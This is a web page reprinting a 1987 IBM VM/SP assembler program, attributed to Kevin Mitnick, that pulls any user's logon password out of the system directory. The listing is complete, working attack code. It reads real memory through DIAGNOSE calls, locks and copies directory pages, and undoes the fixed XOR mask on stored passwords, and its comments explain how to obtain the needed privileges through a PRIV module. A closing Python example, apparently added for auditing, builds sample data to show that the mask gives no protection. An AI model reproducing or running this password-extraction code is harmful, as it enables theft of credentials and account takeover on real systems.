Looking Up IBM Passwords

by Kevin Mitnick

This program was written by Kevin Mitnick a few years ago.

It lets a semi-privileged operator pull the password entries out of the VM/SP system directory and decrypt them.

Ordinarily, only the DIRMAIN userid would be able to look up passwords.  The program will work on CMS 3.0.

ibm-password.cms:

TITLE 'PW,<LOOKUP ANYONES CURRENT LOGON PASSWORD>,01,KDM' 

* MODIFICATION HISTORY:
* UPDATE  WHO  WHEN      DESCRIPTION 
* ;001    KDM  02/11/87  THE CREATION.
*
* PROGRAM DESCRIPTION:
* TO SUCCESSFULLY EXECUTE THIS PROGRAM THE USER MUST HAVE 
* THE CLASS 'A' AND CLASS 'C' OR 'E' PRIVILEGE BITS. TO 
* GET AROUND THIS RESTRICTION, EXECUTE THE PRIV MODULE 
* TO SET THE REQUIRED PRIVILEGE BITS. YOU MUST HAVE THE 
* CLASS 'B' BIT TO EXECUTE THE PRIV MODULE. 
* 
* THIS PROGRAM WILL ALLOW YOU TO LOOKUP ANYONES PASSWORD. 
* THE PROGRAM STARTS OUT BY LOOKING AT THE PSA TO GET A 
* POINTER TO THE SYSLOCS INFORMATION. THE SYSLOCS 
* INFORMATION CONTAINS A POINTER TO DMKSYSPL, WHICH IS THE 
* VIRTUAL LIST OF POINTERS TO THE VM/SP DIRECTORY. AFTER ALL 
* THE CURRENT POINTERS ARE OBTAINED THE PROGRAM WILL FIND THE 
* REAL ADDRESS OF EACH PAGE POINTER AND LOCK THAT PAGE INTO 
* REAL MEMORY. AFTER THE PAGE IS LOCKED THIS PROGRAM STEALS 
* THE PAGE AND STORES IT IN VIRTUAL MEMORY. THE USERID THAT 
* WAS SPECIFIED ON THE COMMAND LINE WILL BE ENCRYPTED. 
* 
* AFTER THE USERID IS MASKED THE PROGRAM WILL SEARCH THE 
* PAGE FOR A MATCH, IF THE USERID IS NOT FOUND THE PROGRAM 
* WILL CONTINUE RETRIEVING PAGES AND SEARCHING UNTIL ALL OF 
* THE PAGES IN THE VIRTUAL POINTER LIST HAVE BEEN CHECKED. 
* WHEN THE LIST IS EXHAUSTED A MESSAGE WILL BE PRINTED 
* INFORMING THE USER THAT IT'S NOT IN THE VM/SP DIRECTORY. 
* WHEN THERE IS A MATCH THE USERID AND PASSWORD WILL BE 
* DECRYPTED AND DISPLAYED ON THE TERMINAL. 
* 
* NOTES: 
* THE PAGE BUFFER AND THE ADDRESS OF THE VIRTUAL LIST OF 
* REAL ADDRESSES TO BE EXAMINED BY THE EXAMINE REAL 
* MEMORY DIAGNOSE MUST BE IN THE SAME PAGE OF VIRTUAL 
* STORAGE, THEREFORE, THIS PROGRAM RESERVES A PAGE OF 
* STORAGE AT X'0021000' FOR THOSE REQUIREMENTS. SEE SYSTEMS 
* PROGRAMMERS GUIDE FOR FURTHER INFORMATION.
*
***  UDIRBLOK - USER DIRECTORY CONTROL BLOCK 
* 
*  0 +-----------+-----------+-----------------+
*    |  UDIRRSV1 |  UDIRDISP |     UDIRDASD    |
*    +-----------+-----------+-----------------+
*  8 |      UDIRUSER                           |
*    +-----------------------------------------+
* 10 |      UDIRPASS                           |
*    +-----------------------------------------+
*
*** UDIRBLOK - USER DIRECTORY CONTROL BLOCK

         PRINT NOGEN                             ;DONT EXPAND MACROS. 
UDIRBLOK DSECT 
         SPACE 
UDIRRSV1 DS 1H  RESERVED FOR FUTURE USE 
UDIRDISP DS 1H  DISPLACEMENT OF THE NEXT BLOCK 
UDIRDASD DS 1F  DASD ADDRESS OF THE NEXT BLOCK 
UDIRUSER DS 1D  USERID 
UDIRPASS DS 1D  USER PASSWORD 
         SPACE 
UDIRSIZE EQU (*-UDIRBLOK)/8 UDIRBLOK SIZE IN DOUBLEWORDS 
         EJECT 
PW       START X'2000'                           ; LOAD INTO CMS USER AREA. 
         ENTRY PW                                ; ESTABLISH ENTRY POINT. 
         STM R14,R12,12(R13)                     ; SAVE THE SUPERVISOR'S REGISTERS. 
         LR R12,R15                              ; MAKE REGISTER 12 OUR BASE.
         LA R11,4095(R12)                        ; INITIALIZE 2ND BASE REGISTER. 
         LA R11,1(R11)                           ; ADD 1 TO MAKE IT A 4K. 
         USING PW,R12,R11                        ; ESTABLISH ADDRESSABILITY.
         ST R13,SAVEREG+4                        ; STORE REGISTER 13 IN SAVE AREA.
         LA R13,SAVEREG                          ; SAVE OUR SAVE AREA ADDRESS. 
         B SKIPCOPY                              ; BRANCH OVER THE COPYRIGHT NOTICE. 
         SPACE
         DC CL8'PW'                              ; THE PROGRAMS NAME FOR THE COPYRIGHT NOTICE.
         DC C'COPYRIGHT 1987 KEVIN D. MITNICK' 
         SPACE 
SKIPCOPY DS 0H 
         CLI 8(R1),X'FF'                         ; USERID SPECIFIED ON COMMAND LINE?
         BNE GOTUSER                             ; YES. CONTINUE PROCESSING.
         WRTERM '?INVALID FORMAT - FORMAT IS: PW <USERID>'
         B GETOUT                                ; EXIT PROGRAM. 
GOTUSER  DS 0H 
         MVC USERID,8(R1)                        ; SAVE USERID. 
         XC USERID,MASK                          ; ENCRYPT USERID FOR SEARCH.
         BAL R14,GETPNUMS                        ; GET THE VIRTUAL PAGE POINTERS.
         LTR R15,R15                             ; POINTER LOOKUP SUCCESSFUL?
         BNZ ERROR                               ; NOPE. EXIT PROGRAM.
         LA R10,DMKSYSPL                         ; POINT TO OUR VIRTUAL PTR LIST.
NEXTPAGE DS 0H 
         ICM R2,B'1111',0(R10)                   ; END OF VIRTUAL POINTER LIST?
         BM NOSUCH                               ; YES. USER NOT FOUND.
         LA R10,4(R10)                           ; BUMP TO NEXT VIRTUAL PAGE POINTER.
         SRL R2,4                                ; SHIFT OFF 4 BITS TO ALIGN ON BYTE.
         ST R2,TEMPFW1                           ; X'000E1000' -> X'0000E100'
         UNPK TEMPFW2(5),TEMPFW1+1(3)            ; X'0000E100' -> X'F0F0FEF1' 
         TR TEMPFW2,BIN2CHR                      ; FIX FULLWORD FOR CP LOCK CMD.
         MVC FIRSTPG1,TEMPFW2+1                  ; MOVE FIRST PAGE # TO LOCK CMD.
         MVC LASTPG1,TEMPFW2+1                   ; MOVE LAST PAGE # TO LOCK CMD.
         MVI RESPBUF,X'40'                       ; CLEAR THE RESPONSE BUFFER.
         MVC RESPBUF+1(129),RESPBUF
         LA R9,2                                 ; EXECUTE LOCK COMMAND TWICE.
LCKAGAIN DS 0H
         LA R4,CPLOCK                            ; RX -> ADDRESS OF CP COMMAND.
         LA R5,RESPBUF                           ; RX+1 -> ADDRESS OF RESPONSE BUFFER.
         LA R6,23                                ; RY -> LENGTH OF CP COMMAND.
         ICM R6,B'1000',=X'40'                   ; SET FLAG TO STORE RESP IN BUFFER.
         LA R7,130                               ; RY+1 -> LENGTH OF RESPONSE BUFFER.
         DC X'83460008'                          ; VIRTUAL CONSOLE DIAGNOSE.
         BNZ DIAGERR                             ; SOMETHING WENT WRONG, ISSUE ERROR.
         LTR R6,R6                               ; CHECK CP LOCK RETURN CODE. 
         BNZ LOCKERR                             ; CP LOCK ERROR OCCURRED.
         BCT R9,LCKAGAIN                         ; DO IT TWICE TO MAKE SURE IT LOCKED
         LA R2,RESPBUF                           ; POINT TO THE RESPONSE BUFFER.
         MVC TMPREAL,25(R2)                      ; MOVE EBCDIC REAL ADDR TO TMP FIELD 
         TR TMPREAL,CHR2BIN                      ; FIX FOR REAL MEMORY DIAGNOSE.
         PACK REALADDR(5),TMPREAL(9) 
         MVC RADDRLST,REALADDR                   ; MOVE REAL ADDRESS TO VIRTUAL LIST. 
         BAL R14,GETAPAGE                        ; GO READ IN THE PAGE.
         LTR R15,R15                             ; WAS THE PAGE RETRIEVAL SUCCESSFUL?
         BNZ PAGEERR                             ; NOPE. NOTIFY USER.
         MVC FIRSTPG2,TEMPFW2+1                  ; MOVE FIRST PAGE # TO UNLOCK CMD.
         MVC LASTPG2,TEMPFW2+1                   ; MOVE LAST PAGE # TO UNLOCK CMD.
         LA R4,CPUNLOCK                          ; RX -> ADDRESS OF CP COMMAND.
         LA R5,RESPBUF                           ; RX+1 -> ADDRESS OF RESPONSE BUFFER
         LA R6,21                                ; RY -> LENGTH OF CP COMMAND
         ICM R6,B'1000',=X'40'                   ; SET FLAG TO STORE RESP IN BUFFER
         LA R7,130                               ; RY+1 -> LENGTH OF RESPONSE BUFFER
         DC X'83460008'                          ; EXECUTE VIRTUAL CONSOLE DIAGNOSE.
         BNZ DIAG8ERR                            ; COMMAND FAILED, INFORM THE USER.
         LTR R6,R6                               ; CHECK CP LOCK RETURN CODE.
         BNZ UNLCKERR                            ; CP UNLOCK ERROR OCCURRED.
         LA R3,PAGEBUF                           ; POINT TO THE UDIRBLOKS.
         USING UDIRBLOK,R3                       ; USE THE UDIRBLOK DSECT.
         LA R4,PAGEBUF                           ; GET THE START ADDRESS OF PAGEBUF.
         AH R4,UDIRDISP                          ; POINT TO THE LAST UDIRBLOK.
NEXTUSER DS 0H 
         CLC USERID,UDIRUSER                     ; IS THIS THE USERID?
         BE GOTCHA                               ; YEP. GET THE PASSWORD & PRINT IT.
         LA R3,UDIRSIZE*8(R3)                    ; BUMP R3 TO GET NEXT USERID.
         CLR R3,R4                               ; ARE WE AT THE END OF THE PAGE.
         BH NEXTPAGE                             ; YEP. GO GET ANOTHER PAGE.
         B NEXTUSER                              ; KEEP ON CHECKING THE USERIDS.
GOTCHA   DS 0H 
         MVC OUSERID,UDIRUSER                    ; MOVE OUT THE USERID.
         MVC OPASSWD,UDIRPASS                    ; MOVE OUT THE PASSWORD.
         XC OUSERID,MASK                         ; DECRYPT THE USERID.
         XC OPASSWD,MASK                         ; DECRYPT THE PASSWORD.
         WRTERM OUSRPWD,LUSRPWD                  ; WRITE OUT USERID & PASSWORD.
         B GETOUT                                ; ALL DONE, BETTER EXIT NOW.
PAGEERR  DS 0H 
         WRTERM '?PAGE READ ERROR'
         B GETOUT                                ; EXIT PROGRAM. 
NOSUCH   DS 0H 
         WRTERM '?USERID IS NOT IN THE VM/SP DIRECTORY' 
         B GETOUT                                ; EXIT PROGRAM. 
DIAG8ERR DS 0H 
         WRTERM '?VIRTUAL CONSOLE DIAGNOSE FAILED' 
         B GETOUT                                ; EXIT PROGRAM. 
LOCKERR  DS 0H 
         WRTERM '?CP LOCK ERROR OCCURRED' 
         B GETOUT                                ; EXIT PROGRAM. 
UNLCKERR DS 0H 
         WRTERM '?CP UNLOCK ERROR OCCURRED' 
         B GETOUT                                ; EXIT PROGRAM.
ERROR    DS 0H 
         WRTERM '?ERROR READING VIRTUAL PAGE POINTERS' 
         B GETOUT                                ; EXIT PROGRAM. 
*
* SUBROUTINE TO GET A COPY OF THE DMKSYSPL POINTERS
* INTO OUR VIRTUAL MEMORY.
*
GETPNUMS DS 0H
         LA R2,PSA                               ; POINT ADDRESS OF SYSLOCS.
         LA R3,1                                 ; ONLY 1 ENTRY.
         LA R4,SYSLOCS                           ; STORE ADDR OF SYSLOCS HERE.
         DC X'83230004'                          ; PEEK AT REAL MEMORY.
         L R2,SYSLOCS                            ; MOVE REAL ADDR OF SYSLOCS TO R2.
         LA R2,56(R2)                            ; ADD OFFSET TO POINT TO DMKSYSPL.
         ST R2,PLPTR                             ; STORE THAT ADDRESS FOR DIAG.
         LA R2,PLPTR                             ; POINT TO THAT ADDRESS.
         LA R3,1                                 ; ONLY 1 ENTRY.
         LA R4,SYSPLPTR                          ; STORE ADDRESS OF 1ST PAGE POINTER.
         DC  X'83230004'                         ; PEEK AT REAL MEMORY.
         LA R6,DMKSYSPL                          ; POINT TO OUR PAGE POINTERS LIST.
         LA R7,16                                ; ALLOW UP TO 16 PAGE POINTERS.
LOOP     DS 0H
         LA  R2,SYSPLPTR                         ; POINT TO 1ST VIRTUAL PAGE ADDRESS.
         LA R3,1                                 ; ONLY 1 ENTRY.
         LA R4,TEMPPL                            ; STORE PAGE ADDR IN HOLD AREA.
         DC X'83230004'                          ; PEEK AT REAL MEMORY.
         ICM R1,15,0(R4)                         ; IS THIS THE LAST VIRTUAL PAGE PTR?
         ST R1,0(R6)                             ; STORE ADDR OF PAGE IN OUR VIR LIST.
         LA R6,4(R6)                             ; BUMP POINTER TO NEXT FULLWORD.
         BM LASTONE                              ; YES. CONTINUE ON.
         L R2,SYSPLPTR                           ; GET OLD VIRTUAL PAGE POINTER ADDR.
         LA R2,4(R2)                             ; BUMP FULLWORD TO GET NEXT POINTER.
         ST R2,SYSPLPTR                          ; REPLACE FOR NEXT PEEK MEMORY DIAG.
         BCT R7,LOOP                             ; ALLOW FOR UP TO 16 TABLE ENTRIES.
         LA  R15,16                              ; SET RETURN CODE TO 16.
         WRTERM '?ERROR READING PAGE POINTERS'
         BR R14
LASTONE  DS 0H
         LA R15,0                                ; SET RETURN CODE TO 0 (SUCCESS).
         BR R14                                  ; RETURN TO CALLER.
*
GETAPAGE DS 0H
         LA R9,1020                              ; GET 1020 FULLWORDS FROM REALADDR.
         LA R4,PAGEBUF                           ; POINT TO BEGINNING PAGE BUFFER.
PEEKER   DS 0H
         LA R2,RADDRLST                          ; POINT TO ADDRESS TO PEEK AT.
         LA R3,1                                 ; ONLY 1 ENTRY IN PEEK LIST.
         LA R4,0(R4)                             ; POINT TO THE PAGE BUFFER.
         DC X'83230004'                          ; EXAMINE REAL MEMORY.
         BNZ BADREAD                             ; PEEK FAILED, ISSUE ERROR MESSAGE.
         LA R4,4(R4)                             ; BUMP PAGE BUFFER ONE FULLWORD.
         L R2,RADDRLST                           ; GET LAST ADDRESS EXAMINED.
         LA R2,4(R2)                             ; INCREMENT BY A FULLWORD.
         ST R2,RADDRLST                          ; REPLACE IN VIRTUAL LIST.
         BCT R9,PEEKER                           ; GO PEEK AGAIN.
         LA R15,0                                ; SET RETURN CODE TO 0 (SUCCESS).
         BR R14                                  ; RETURN TO CALLER.
BADREAD  DS 0H
         LA R15,16                               ; SET RETURN CODE TO 16 (FATAL).
         BR R14                                  ; RETURN TO CALLER
*
* RESTORE THE CALLING PROGRAM'S REGISTERS, SET THE CMS RETURN
* CODE, AND EXIT THE PROGRAM.
*
GETOUT   DS 0H
         L  R13,SAVEREG+4                        ; GET POINTER TO SAVED REGISTERS.
         LM R14,R12,12(R13)                      ; RESTORE THE CALLERS REGISTERS.
         XR R15,R15                              ; SET RETURN CODE TO ZERO.
         BR R14                                  ; AND BACK TO THE CALLER WE GO.
*
* DEFINE CONSTANTS AND STORAGE SECTION. 
* 
CPLOCK   DS 0D                                   ; THIS COMMAND WILL CAUSE THE
         DC C'LOCK SYSTEM '                      ; DESIRED VIRTUAL PAGE NUMBERS 
FIRSTPG1 DC CL3' '                               ; TO BE LOCKED IN REAL STORAGE. 
         DC C' '
LASTPG1  DC CL3' '                               ; LAST PAGE # (COMMAND IS 23 BYTES).
         DC C' '
         DC C'MAP'
* 
CPUNLOCK DS 0H                                   ; THIS COMMAND WILL RELEASE PAGES
         DC C'UNLOCK SYSTEM '                    ; LOCKED IN REAL STORAGE BY THIS 
FIRSTPG2 DC CL3' '                               ; PROGRAM. 
         DC C' ' 
LASTPG2  DC CL3' '
* 
BIN2CHR  DS 0H                                   ; BINARY TO CHARACTER TRANSLATION 
         DC 256AL1(*-BIN2CHR)                    ; TABLE USED TO OBTAIN VIRTUAL 
         ORG BIN2CHR+X'40'                       ; PAGE NUMBER FOR LOCK COMMAND.
         DC X'00' 
         ORG BIN2CHR+X'FA'
         DC CL6'ABCDEF'
         ORG ,
*
CHR2BIN  DS 0H                                   ; CHARACTER TO BINARY TRANSLATION 
         DC 256AL1(*-CHR2BIN)                    ; TABLE, USED TO CONVERT INFO 
         ORG CHR2BIN+X'C1'                       ; RECEIVED FROM CP LOCK COMMAND 
         DC X'0A0B0C0D0E0F'                      ; TO AN ACTUAL FULLWORD ADDRESS. 
         ORG ,
* 
         DS 0F                                   ; ALIGN ON A FULLWORD BOUNDARY.
REALADDR DS CL4                                  ; WORK AREA TO OBTAIN REAL ADDRESS
         DS C                                    ; FOR EXAMINE REAL STORAGE DIAG.
*
TMPREAL  DS CL8                                  ; TEMP HOLD AREA WHILE FUDGING 
         DS C                                    ; BITS. 
*
TEMPFW1  DS F                                    ; TEMP HOLD AREA FOR A FULLWORD.
*
TEMPFW2  DS F                                    ; TEMP HOLD AREA FOR A FULLWORD. 
         DS C                                    ; WORK BYTE FOR UNPK INSTRUCTION.
*
MASK     DC 8X'AA'                               ; MASK FOR PASSWORD ENCRYPTION.
USERID   DC CL8' '                               ; CMS USERID HOLD AREA.
SYSLOCS  DS F                                    ; ADDRESS OF SYSLOCS INFORMATION.
SYSPLPTR DS F                                    ; FIRST VIRTUAL PAGE POINTER.
PLPTR    DS F                                    ; POINTER TO DMKSYSPL.
TEMPPL   DS F                                    ; HOLDING AREA FOR DMKSYSPL PTRS.
PSA      DC XL4'000003A8'                        ; REAL ADDRESS FOR SYSLOCS INFO.
DMKSYSPL DS 16F                                  ; 16 FULLWORDS OF X'00'.
RESPBUF  DS CL130' '                             ; RESPONSE BUFFER FOR CP LOCK CMDS. 
*
OUSRPWD  DS 0H                                   ; USERID AND PASSWORD OUTPUT LINE. 
         DC C'%USERID: '
OUSERID  DC CL8' '                               ; DECRYPTED USERID GOES HERE. 
         DC C' PASSWORD: '
OPASSWD  DC CL8' '                               ; DECRYPTED PASSWORD GOES HERE.
LUSRPWD  EQU *-OUSRPWD                           ; LENGTH OF PASSWORD DISPLAY MESSAGE
*
SAVEREG  DS 18F                                  ; AREA TO SAVE CALLERS REGISTERS.
*
         ORG PW+4096                             ; RESET ON A PAGE BOUNDARY.
*
RADDRLST DS F                                    ; REAL PAGE POINTER ADDRESS LIST.
PAGEBUF  DS 4080X                                ; PAGE BUFFER = (4K - 2D)
         ORG ,                                   ; RESET LOCATION COUNTER.
         LTORG                                   ; LITERAL POOL STARTS HERE.
         REGEQU                                  ; SET UP REGISTER EQUATES.
*
         END                                     ; AND THAT'S ALL FOLKS.
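The UDIRBLOK layout and the 8-byte MASK above are all an auditor needs to see why this "encryption" protects nothing: XOR with a fixed byte is its own inverse, so anyone who can read the page can read the password. The Python below is an added example, not part of the original listing or of VM/SP. It constructs a page of UDIRBLOK entries in the DSECT's layout with made-up userids and passwords, walks it the way the NEXTUSER loop does (from the first block through the displacement held in the first block's UDIRDISP), and applies the same mask to hide and to reveal a field. The cp037 EBCDIC codec stands in for the CMS character set and the 4080-byte page size matches PAGEBUF; both are assumptions for the demonstration.

```python
"""Walk a constructed VM/SP directory page laid out as UDIRBLOK entries.

UDIRBLOK layout, from the DSECT on this page:
  +0  UDIRRSV1  2 bytes  reserved
  +2  UDIRDISP  2 bytes  displacement of the last block in the page
  +4  UDIRDASD  4 bytes  DASD address of the next block
  +8  UDIRUSER  8 bytes  userid, XORed with MASK
  +16 UDIRPASS  8 bytes  password, XORed with MASK
"""
import struct

MASK = bytes([0xAA]) * 8   # MASK DC 8X'AA' in the listing
UDIRLEN = 24               # UDIRSIZE*8: three doublewords per block
PAGELEN = 4080             # PAGEBUF DS 4080X
EBCDIC = "cp037"           # assumption: stand-in for the CMS code page


def xor_mask(field: bytes) -> bytes:
    """Apply the fixed mask. Because XOR is an involution, masking and
    unmasking are the same operation: xor_mask(xor_mask(x)) == x."""
    return bytes(b ^ m for b, m in zip(field, MASK))


def ebcdic_field(text: str) -> bytes:
    """Upper-case, pad to 8 and encode, as a CL8 userid/password field is stored."""
    return text.upper().ljust(8).encode(EBCDIC)


def build_page(entries):
    """Construct a page of masked UDIRBLOKs (sample data, not a real directory).

    The first block's UDIRDISP is set to the displacement of the last block,
    which is what the program's 'AH R4,UDIRDISP' relies on to bound its loop.
    """
    last_disp = (len(entries) - 1) * UDIRLEN
    blocks = []
    for i, (user, password) in enumerate(entries):
        disp = last_disp if i == 0 else (i + 1) * UDIRLEN
        header = struct.pack(">HHI", 0, disp, 0)          # UDIRRSV1, UDIRDISP, UDIRDASD
        blocks.append(header + xor_mask(ebcdic_field(user))
                      + xor_mask(ebcdic_field(password)))
    return b"".join(blocks).ljust(PAGELEN, b"\x00")


def iter_udirbloks(page: bytes):
    """Yield (userid, password) pairs, unmasked, first block through UDIRDISP."""
    last = struct.unpack(">H", page[2:4])[0]
    for off in range(0, last + 1, UDIRLEN):
        user = xor_mask(page[off + 8:off + 16]).decode(EBCDIC).rstrip()
        password = xor_mask(page[off + 16:off + 24]).decode(EBCDIC).rstrip()
        yield user, password


def lookup(page: bytes, userid: str):
    """Mirror the program's search: mask the query once, compare masked bytes,
    unmask only the matching password field. Returns None if not in the page."""
    target = xor_mask(ebcdic_field(userid))
    last = struct.unpack(">H", page[2:4])[0]
    for off in range(0, last + 1, UDIRLEN):
        if page[off + 8:off + 16] == target:
            return xor_mask(page[off + 16:off + 24]).decode(EBCDIC).rstrip()
    return None


def recoverable_without_secret(page: bytes) -> bool:
    """Audit check: True if every password in the page can be recovered using
    only the public layout and the constant mask, i.e. no key is needed."""
    return all(pw != "" for _, pw in iter_udirbloks(page))


if __name__ == "__main__":
    sample = build_page([("ALICE", "SESAME"), ("BOB", "HUNTER2"), ("OPERATOR", "OPPASS")])
    for user, password in iter_udirbloks(sample):
        print(f"{user:8} {password}")
    print("lookup BOB ->", lookup(sample, "bob"))
    print("recoverable with no secret:", recoverable_without_secret(sample))
```

The point the check makes is the one that matters for anyone storing credentials: a reversible transform keyed by a constant is equivalent to plaintext for every reader of the storage, whereas a one-way salted hash would let the directory verify a logon without ever holding a recoverable password.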
